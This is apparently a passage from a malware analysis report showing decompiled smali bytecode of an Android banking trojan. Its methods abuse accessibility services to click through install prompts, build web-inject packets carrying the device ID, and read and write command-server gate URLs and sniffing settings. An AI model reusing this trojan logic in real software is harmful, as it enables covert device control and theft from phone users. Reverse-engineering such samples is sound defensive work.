                        37invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        38new-instance v2, Ljava/lang/StringBuilder;
                        40invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        42const-string v3, "[makeClick] [element] getActionList: "
                        44invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45move-result-object v2
                        47invoke-virtual {v1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getActionList()Ljava/util/List;
                        48move-result-object v3
                        50invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        51move-result-object v2
                        53invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        54move-result-object v2
                        56invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        57const/16 v2, 0x10
                        59invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(I)Z
                        60try_end_52: move-result v0
                        61goto_53: return v0
                        62catch_54: move-exception v1
                        63new-instance v2, Ljava/lang/StringBuilder;
                        65invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        67const-string v3, "makeClick: "
                        69invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        70move-result-object v2
                        72invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        73move-result-object v1
                        75invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        76move-result-object v1
                        78invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        79goto/16 :goto_53
                        APIs
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • java.util.Locale.getDefault
                        • java.util.Locale.getLanguage
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • UID
                        • package
                        • lng
                        • stopWord
                        • reason
                        • webInj
                        • data
                        • [func] [makeWebInjPacket] T:
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Lorg/json/JSONObject;
                        3invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        4try_start_5: new-instance v1, Lorg/json/JSONObject;
                        6invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
                        8const-string v2, "UID"
                        10invoke-virtual {p0, p1}, Lcom/lib;->getUID(Landroid/content/Context;)Ljava/lang/String;
                        11move-result-object v3
                        13invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        15const-string v2, "package"
                        17invoke-virtual {v1, v2, p2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        19const-string v2, "lng"
                        21invoke-static {}, Ljava/util/Locale;->getDefault()Ljava/util/Locale;
                        22move-result-object v3
                        24invoke-virtual {v3}, Ljava/util/Locale;->getLanguage()Ljava/lang/String;
                        25move-result-object v3
                        27invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        29const-string v2, "stopWord"
                        31invoke-virtual {v1, v2, p3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        33const-string v2, "reason"
                        35const-string v3, "webInj"
                        37invoke-virtual {v0, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        39const-string v2, "data"
                        41invoke-virtual {v0, v2, v1}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        42try_end_36: return-object v0
                        43catch_37: move-exception v0
                        44new-instance v1, Ljava/lang/StringBuilder;
                        46invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        48const-string v2, "[func] [makeWebInjPacket] T: "
                        50invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        51move-result-object v1
                        53invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        54move-result-object v0
                        56invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        57move-result-object v0
                        59invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        60const/4 v0, 0x0
                        61goto/16 :goto_36
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        • android.os.Bundle.putFloatArray
                        • android.os.Bundle.putFloat
                        • android.os.Bundle.putLongArray
                        • android.os.Bundle.putLong
                        • android.os.Bundle.putIntArray
                        • android.os.Bundle.putInt
                        • android.os.Bundle.putDoubleArray
                        • android.os.Bundle.putDouble
                        • android.os.Bundle.putBooleanArray
                        • android.os.Bundle.putBoolean
                        • android.os.Bundle.putStringArray
                        • android.os.Bundle.putString
                        • android.os.Bundle.putBundle
                        • android.os.Bundle.putBundle
                        • android.os.Bundle.putParcelable
                        Strings
                        • Unknown type
                        Position Instruction Meta Information
                        0packed-switch p1, :pswitch_data_96
                        1new-instance p2, Ljava/lang/RuntimeException;
                        2new-instance p3, Ljava/lang/StringBuilder;
                        4invoke-direct {p3}, Ljava/lang/StringBuilder;-><init>()V
                        6const-string v0, "Unknown type "
                        8invoke-virtual {p3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10invoke-virtual {p3, p1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        12invoke-virtual {p3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        13move-result-object p1
                        15invoke-direct {p2, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        16throw p2
                        17pswitch_1a:
                        18invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readFloatArray()[F
                        19move-result-object p1
                        21invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putFloatArray(Ljava/lang/String;[F)V
                        22goto/16 :goto_95
                        23pswitch_23:
                        24invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readFloat()F
                        25move-result p1
                        27invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putFloat(Ljava/lang/String;F)V
                        28goto/16 :goto_95
                        29pswitch_2c:
                        30invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readLongArray()[J
                        31move-result-object p1
                        33invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putLongArray(Ljava/lang/String;[J)V
                        34goto/16 :goto_95
                        35pswitch_34:
                        36invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readLong()J
                        37move-result-wide v0
                        39invoke-virtual {p3, p2, v0, v1}, Landroid/os/Bundle;->putLong(Ljava/lang/String;J)V
                        40goto/16 :goto_95
                        41pswitch_3c:
                        42invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readIntArray()[I
                        43move-result-object p1
                        45invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putIntArray(Ljava/lang/String;[I)V
                        46goto/16 :goto_95
                        47pswitch_44:
                        48invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readInt()I
                        49move-result p1
                        51invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putInt(Ljava/lang/String;I)V
                        52goto/16 :goto_95
                        53pswitch_4c:
                        54invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readDoubleArray()[D
                        55move-result-object p1
                        57invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putDoubleArray(Ljava/lang/String;[D)V
                        58goto/16 :goto_95
                        59pswitch_54:
                        60invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readDouble()D
                        61move-result-wide v0
                        63invoke-virtual {p3, p2, v0, v1}, Landroid/os/Bundle;->putDouble(Ljava/lang/String;D)V
                        64goto/16 :goto_95
                        65pswitch_5c:
                        66invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readBooleanArray()[Z
                        67move-result-object p1
                        69invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putBooleanArray(Ljava/lang/String;[Z)V
                        70goto/16 :goto_95
                        71pswitch_64:
                        72invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readBoolean()Z
                        73move-result p1
                        75invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putBoolean(Ljava/lang/String;Z)V
                        76goto/16 :goto_95
                        77pswitch_6c: const/4 p1, 0x0
                        78new-array p1, p1, [Ljava/lang/String;
                        80invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelStream;->readArray([Ljava/lang/Object;)[Ljava/lang/Object;
                        81move-result-object p1
                        82check-cast p1, [Ljava/lang/String;
                        84invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putStringArray(Ljava/lang/String;[Ljava/lang/String;)V
                        85goto/16 :goto_95
                        86pswitch_79:
                        87invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readString()Ljava/lang/String;
                        88move-result-object p1
                        90invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putString(Ljava/lang/String;Ljava/lang/String;)V
                        91goto/16 :goto_95
                        92pswitch_81:
                        93invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readBundle()Landroid/os/Bundle;
                        94move-result-object p1
                        96invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putBundle(Ljava/lang/String;Landroid/os/Bundle;)V
                        97goto/16 :goto_95
                        98pswitch_89:
                        99invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelStream;->readBundle()Landroid/os/Bundle;
                        100move-result-object p1
                        102invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putBundle(Ljava/lang/String;Landroid/os/Bundle;)V
                        103goto/16 :goto_95
                        104pswitch_91: const/4 p1, 0x0
                        106invoke-virtual {p3, p2, p1}, Landroid/os/Bundle;->putParcelable(Ljava/lang/String;Landroid/os/Parcelable;)V
                        107goto_95: return-void
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [0] skipNeedSET:
                        • skipNeed:
                        • skip
                        • [1] skipNeedSET:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2const/4 v1, 0x0
                        3try_start_2: new-instance v2, Ljava/lang/StringBuilder;
                        5invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        7const-string v3, "[0] skipNeedSET: "
                        9invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10move-result-object v2
                        11sget-boolean v3, Lcom/lib;->skipNeedSET:Z
                        13invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        14move-result-object v2
                        16const-string v3, " skipNeed: "
                        18invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        19move-result-object v2
                        21sget-object v3, Lcom/lib;->skipNeed:Ljava/lang/Integer;
                        23invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        24move-result-object v2
                        26invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        27move-result-object v2
                        29invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        30sget-boolean v2, Lcom/lib;->skipNeedSET:Z
                        31if-nez v2, :cond_39
                        32const/4 v2, 0x1
                        33sput-boolean v2, Lcom/lib;->skipNeedSET:Z
                        35const-string v2, "skip"
                        37invoke-virtual {p1, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        38move-result v2
                        40invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        41move-result-object v2
                        42sput-object v2, Lcom/lib;->skipNeed:Ljava/lang/Integer;
                        43cond_39:
                        44sget-object v2, Lcom/lib;->skipNeed:Ljava/lang/Integer;
                        46invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        47move-result v2
                        48if-eqz v2, :cond_52
                        50sget-object v2, Lcom/lib;->skipNeed:Ljava/lang/Integer;
                        52sget-object v2, Lcom/lib;->skipNeed:Ljava/lang/Integer;
                        54invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        55move-result v2
                        56add-int/lit8 v2, v2, -0x1
                        58invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        59move-result-object v2
                        60sput-object v2, Lcom/lib;->skipNeed:Ljava/lang/Integer;
                        61goto_51: return v0
                        62cond_52: const/4 v0, 0x0
                        63sput-boolean v0, Lcom/lib;->skipNeedSET:Z
                        64new-instance v0, Ljava/lang/StringBuilder;
                        66invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        68const-string v2, "[1] skipNeedSET: "
                        70invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        71move-result-object v0
                        72sget-boolean v2, Lcom/lib;->skipNeedSET:Z
                        74invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        75move-result-object v0
                        77const-string v2, " skipNeed: "
                        79invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        80move-result-object v0
                        82sget-object v2, Lcom/lib;->skipNeed:Ljava/lang/Integer;
                        84invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        85move-result-object v0
                        87invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        88move-result-object v0
                        90invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        91try_end_79: move v0, v1
                        92goto/16 :goto_51
                        93catch_7b: move-exception v0
                        94move v0, v1
                        95goto/16 :goto_51
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.getAll
                        • java.util.Map.entrySet
                        • java.util.Set.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Map$Entry.getValue
                        • java.lang.Object.toString
                        • java.util.List.add
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • [func] [getGateUrls] T:
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Landroid/content/Context;",
                        4"Ljava/lang/String;",
                        5")",
                        6"Ljava/util/List",
                        7"<",
                        8"Ljava/lang/String;",
                        9">;"
                        10}
                        11.end annotation
                        12.prologue
                        13new-instance v1, Ljava/util/ArrayList;
                        15invoke-direct {v1}, Ljava/util/ArrayList;-><init>()V
                        16try_start_5:
                        17sget-object v0, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        19invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->acquire()V
                        20try_end_a: const/4 v0, 0x0
                        21try_start_b:
                        22invoke-virtual {p1, p2, v0}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        23move-result-object v0
                        25invoke-interface {v0}, Landroid/content/SharedPreferences;->getAll()Ljava/util/Map;
                        26move-result-object v0
                        28invoke-interface {v0}, Ljava/util/Map;->entrySet()Ljava/util/Set;
                        29move-result-object v0
                        31invoke-interface {v0}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
                        32move-result-object v2
                        33goto_1b:
                        34invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
                        35move-result v0
                        36if-eqz v0, :cond_50
                        38invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        39move-result-object v0
                        40check-cast v0, Ljava/util/Map$Entry;
                        42invoke-interface {v0}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
                        43move-result-object v0
                        45invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        46move-result-object v0
                        48invoke-interface {v1, v0}, Ljava/util/List;->add(Ljava/lang/Object;)Z
                        49try_end_32: goto/16 :goto_1b
                        50catch_33: move-exception v0
                        51try_start_34: new-instance v2, Ljava/lang/StringBuilder;
                        53invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        55const-string v3, "[func] [getGateUrls] T: "
                        57invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        58move-result-object v2
                        60invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        61move-result-object v0
                        63invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        64move-result-object v0
                        66invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        67try_start_4a:
                        68sget-object v0, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        70invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        71goto_4f: return-object v1
                        72cond_50:
                        73sget-object v0, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        75invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        76goto/16 :goto_4f
                        77catch_56: move-exception v0
                        78goto/16 :goto_4f
                        79catchall_58: move-exception v0
                        81sget-object v2, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        83invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        84throw v0
                        Cross References
                        APIs
                        • android.view.accessibility.AccessibilityEvent.getSource
                        • java.lang.Boolean.valueOf
                        • org.json.JSONObject.<init>
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getJSONArray
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.names
                        • org.json.JSONArray.getString
                        • java.lang.String.toString
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.String.equals
                        • java.lang.Boolean.valueOf
                        • java.lang.Boolean.booleanValue
                        Strings
                        • inject
                        • [bot] [installAnywayGP]
                        • [bot] [installAnywayGP] options: passed
                        • [bot] [installAnywayGP] [injectCheckExist] : passed
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        3invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getSource()Landroid/view/accessibility/AccessibilityNodeInfo;
                        4move-result-object v2
                        6invoke-static {v1}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        7move-result-object v0
                        8if-nez v2, :cond_d
                        9move v0, v1
                        10goto_c: return v0
                        11cond_d: new-instance v1, Lorg/json/JSONObject;
                        13invoke-direct {v1, p2}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
                        15invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        16move-result-object v3
                        18invoke-interface {v3}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        19move-result-object v3
                        21invoke-virtual {v1, v3}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        22move-result-object v3
                        24const-string v4, "inject"
                        26invoke-virtual {v3, v4}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
                        27move-result-object v3
                        28const/4 v4, 0x0
                        30invoke-virtual {v3, v4}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        31move-result-object v3
                        33invoke-virtual {v1}, Lorg/json/JSONObject;->names()Lorg/json/JSONArray;
                        34move-result-object v1
                        35const/4 v4, 0x0
                        37invoke-virtual {v1, v4}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
                        38move-result-object v1
                        40invoke-virtual {v1}, Ljava/lang/String;->toString()Ljava/lang/String;
                        41move-result-object v1
                        43invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        44move-result-object v4
                        46invoke-virtual {v1, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        47move-result v1
                        48if-eqz v1, :cond_63
                        50const-string v1, "[bot] [installAnywayGP]"
                        52invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        54invoke-direct {p0, p1, v2, v3}, Lcom/lib;->injectCheckOptions(Landroid/view/accessibility/AccessibilityEvent;Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        55move-result v1
                        56if-eqz v1, :cond_63
                        58const-string v1, "[bot] [installAnywayGP] options: passed"
                        60invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        62invoke-direct {p0, v2, v3}, Lcom/lib;->injectCheckExist(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        63move-result v1
                        64if-eqz v1, :cond_63
                        66const-string v1, "[bot] [installAnywayGP] [injectCheckExist] : passed"
                        68invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        70invoke-direct {p0, v2, v3}, Lcom/lib;->makeAction(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        71move-result v1
                        73invoke-static {v1}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        74try_end_62: move-result-object v0
                        75goto_63:
                        76invoke-virtual {v0}, Ljava/lang/Boolean;->booleanValue()Z
                        77move-result v0
                        78goto/16 :goto_c
                        79catchall_68: move-exception v0
                        80throw v0
                        81catch_6a: move-exception v1
                        82goto/16 :goto_63
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.clear
                        • android.content.SharedPreferences$Editor.putBoolean
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • [func] [writeASniffConfig] T:
                        • [func] [writeASniffConfig] InterruptedException:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v2
                        13if-eqz p4, :cond_14
                        15invoke-interface {v2}, Landroid/content/SharedPreferences$Editor;->clear()Landroid/content/SharedPreferences$Editor;
                        16cond_14: array-length v3, p3
                        17move v1, v0
                        18goto_16: if-ge v1, v3, :cond_21
                        19aget-object v4, p3, v1
                        20const/4 v5, 0x1
                        22invoke-interface {v2, v4, v5}, Landroid/content/SharedPreferences$Editor;->putBoolean(Ljava/lang/String;Z)Landroid/content/SharedPreferences$Editor;
                        23add-int/lit8 v1, v1, 0x1
                        24goto/16 :goto_16
                        25cond_21:
                        26invoke-interface {v2}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        27try_end_24: move-result v0
                        28try_start_25:
                        29sget-object v1, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        31invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        32goto_2a: return v0
                        33catch_2b: move-exception v1
                        34try_start_2c: new-instance v2, Ljava/lang/StringBuilder;
                        36invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        38const-string v3, "[func] [writeASniffConfig] T: "
                        40invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        41move-result-object v2
                        43invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        44move-result-object v1
                        46invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        47move-result-object v1
                        49invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        50try_end_42:
                        51sget-object v1, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        53invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        54try_end_47: goto/16 :goto_2a
                        55catch_48: move-exception v1
                        56new-instance v2, Ljava/lang/StringBuilder;
                        58invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        60const-string v3, "[func] [writeASniffConfig] InterruptedException: "
                        62invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        63move-result-object v2
                        65invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        66move-result-object v1
                        68invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        69move-result-object v1
                        71invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        72goto/16 :goto_2a
                        73catchall_60: move-exception v1
                        74try_start_61:
                        75sget-object v2, Lcom/lib;->aSniffMutex:Ljava/util/concurrent/Semaphore;
                        77invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        78throw v1
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.putString
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • [func] [writeConfigID] ID:
                        • [func] [writeConfigID] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2if-eqz p4, :cond_8
                        3try_start_3:
                        4sget-object v1, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        6invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        7try_start_8: new-instance v1, Ljava/lang/StringBuilder;
                        9invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        11const-string v2, "[func] [writeConfigID] ID: "
                        13invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        14move-result-object v1
                        16invoke-virtual {v1, p3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        17move-result-object v1
                        19invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        20move-result-object v1
                        22invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        23const/4 v1, 0x0
                        25invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        26move-result-object v1
                        28invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        29move-result-object v1
                        31sget-object v2, Lcom/lib;->STRINGS_ID:Ljava/lang/String;
                        33invoke-interface {v1, v2, p3}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
